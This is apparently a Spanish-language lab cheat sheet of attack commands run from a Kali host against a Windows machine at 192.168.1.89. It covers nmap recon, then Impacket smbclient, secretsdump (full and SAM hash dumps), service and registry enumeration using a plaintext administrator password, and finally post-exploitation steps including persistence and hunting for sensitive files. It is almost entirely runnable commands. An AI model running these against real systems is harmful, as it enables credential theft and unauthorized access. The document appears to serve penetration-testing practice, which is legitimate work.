Verificación Inicial de Conectividad

# Desde Kali (192.168.1.85)
ping 192.168.1.89
nmap -sV -sC 192.168.1.89
/////////////////////////////////////
Uso Específico de Impacket con tus Credenciales
1. Verificar Acceso SMB

python3 /usr/share/doc/python3-impacket/examples/smbclient.py Administrador:3186948089@192.168.1.89
//////////////////////////////////
2. Obtener Shell Remoto

# Extraer todos los hashes del sistema
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py Administrador:3186948089@192.168.1.89

# Solo hashes SAM
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam Administrador:3186948089@192.168.1.89
/////////////////////////////////
4. Enumeración Avanzada

# Enumerar servicios y recursos compartidos
python3 /usr/share/doc/python3-impacket/examples/services.py Administrador:3186948089@192.168.1.89 list

# Información del registro
python3 /usr/share/doc/python3-impacket/examples/reg.py Administrador:3186948089@192.168.1.89 query -keyName HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion
////////////////////////////////
Técnicas de Post-Explotación
Una vez que tengas acceso, puedes:

* Crear persistencia (solo para laboratorio)
* Enumerar usuarios y grupos
* Buscar archivos sensibles
* Revisar procesos en ejecución

Comandos Útiles Post-Acceso
Cuando obtengas shell con PSExec o WMIExec:

whoami
net user
net localgroup administrators
dir C:\Users\
tasklist
netstat -an
/////////////////////////////////